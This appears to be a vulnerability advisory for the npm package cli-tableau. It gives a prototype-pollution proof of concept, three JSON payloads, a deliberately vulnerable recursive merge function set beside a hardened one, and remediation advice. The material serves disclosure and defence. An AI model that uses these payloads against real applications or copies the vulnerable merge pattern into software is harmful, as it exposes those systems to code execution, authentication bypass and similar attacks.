
Prototype Pollution in cli-tableau #13

@gnsehfvlr

Description


Prototype Pollution in cli-tableau

Summary

cli-tableau (<= 2.0.1) is vulnerable to Prototype Pollution via the object passed to its exported constructor (the module's main export).

Description

The exported constructor of cli-tableau copies properties from a caller-supplied object without rejecting the keys __proto__, constructor and prototype, so writes are not confined to the target object and can reach Object.prototype. When that object is built from user-controlled input (for example, parsed JSON), an attacker can inject properties via __proto__ or constructor.prototype keys, polluting the prototype of every plain object in the application.

Attack vectors: __proto__ direct, __proto__ nested, constructor.prototype

Proof of Concept

const Table = require('cli-tableau'); // the module's main export is the table constructor

// 1. Pollute Object.prototype. JSON.parse creates an own "__proto__" key,
//    which the library copies without filtering.
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
new Table(malicious);

// 2. Verify pollution on a fresh object that never touched cli-tableau
const obj = {};
console.log(obj.polluted); // "yes" - prototype is polluted
console.log('Vulnerable:', obj.polluted === 'yes');

Impact

Depending on how the host application consumes the polluted properties, successful exploitation can allow an attacker to achieve:

  • Remote Code Execution (RCE) via child_process spawn injection or vm sandbox escape
  • Authentication Bypass via polluted authorization checks
  • SQL Injection through polluted query parameters
  • Denial of Service (DoS) by overriding critical object methods
  • SSRF through polluted URL/host configurations
  • Cross-Site Scripting (XSS) via polluted template variables
  • Path Traversal through polluted file path configurations
  • CORS Bypass via polluted origin/header settings

Remediation

Add key filtering so that the three keys that reach the prototype chain are never copied, and apply it at every level of a recursive merge, not only at the top:

// Reject the keys through which a write can escape to Object.prototype
function isSafe(key) {
  return key !== '__proto__' && key !== 'constructor' && key !== 'prototype';
}

Or use Object.create(null) for target objects, so that __proto__ and constructor resolve to nothing on the target side. Note that this only helps if every nested object the merge creates is also prototype-less; a null-prototype top-level target with ordinary {} children is still exploitable through a nested __proto__ key.
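The following is an added, self-contained example (not cli-tableau's code) that puts the vulnerable pattern beside the hardened one. The unsafeMerge function is an assumed illustration of the classic recursive options merge that produces this class of bug, not the library's actual implementation; the three payloads are constructed to match the attack vectors listed above. It also checks the Object.create(null) mitigation on each vector, which goes beyond the advisory text.

```javascript
'use strict';

// Constructed payloads for the three vectors named in the advisory.
const PAYLOADS = {
  protoDirect: '{"__proto__":{"polluted":"yes"}}',
  protoNested: '{"head":{"__proto__":{"polluted":"yes"}}}',
  constructorPrototype: '{"constructor":{"prototype":{"polluted":"yes"}}}',
};

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable pattern (assumed, for illustration only): a recursive merge that
// walks every enumerable key of the input, including "__proto__" and
// "constructor", and descends into whatever already lives at target[key].
// target["__proto__"] is Object.prototype, target["constructor"] is Object,
// so the recursion ends up writing into Object.prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (target[key] === undefined || target[key] === null) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: reject the three dangerous keys at every level, iterate own
// keys only, and never descend into a value the target merely inherits.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isSafeKey(key) {
  return !FORBIDDEN_KEYS.has(key);
}

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (!isSafeKey(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Run one merge against a fresh target and report whether Object.prototype was
// polluted. The canary is created before the merge and never passed to it, so
// any "polluted" property it shows must have come through the prototype chain.
// Always clean up so later checks start from an unpolluted state.
function pollutes(mergeFn, payloadJson, makeTarget) {
  const canary = {};
  try {
    mergeFn(makeTarget(), JSON.parse(payloadJson));
    return canary.polluted === 'yes';
  } finally {
    delete Object.prototype.polluted;
  }
}

// Compare the unfiltered merge, the unfiltered merge into a null-prototype
// target, and the filtered merge on every payload.
function runAll() {
  const results = {};
  for (const [name, json] of Object.entries(PAYLOADS)) {
    results[name] = {
      unsafe: pollutes(unsafeMerge, json, () => ({})),
      unsafeNullProtoTarget: pollutes(unsafeMerge, json, () => Object.create(null)),
      safe: pollutes(safeMerge, json, () => ({})),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(runAll());
}
```

Running it shows all three payloads polluting through unsafeMerge and none through safeMerge. The null-prototype target stops the direct __proto__ and constructor.prototype vectors but not the nested one, because the merge creates an ordinary {} for the "head" child and the nested __proto__ key then reaches Object.prototype through that child; key filtering is the mitigation that holds at every depth.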
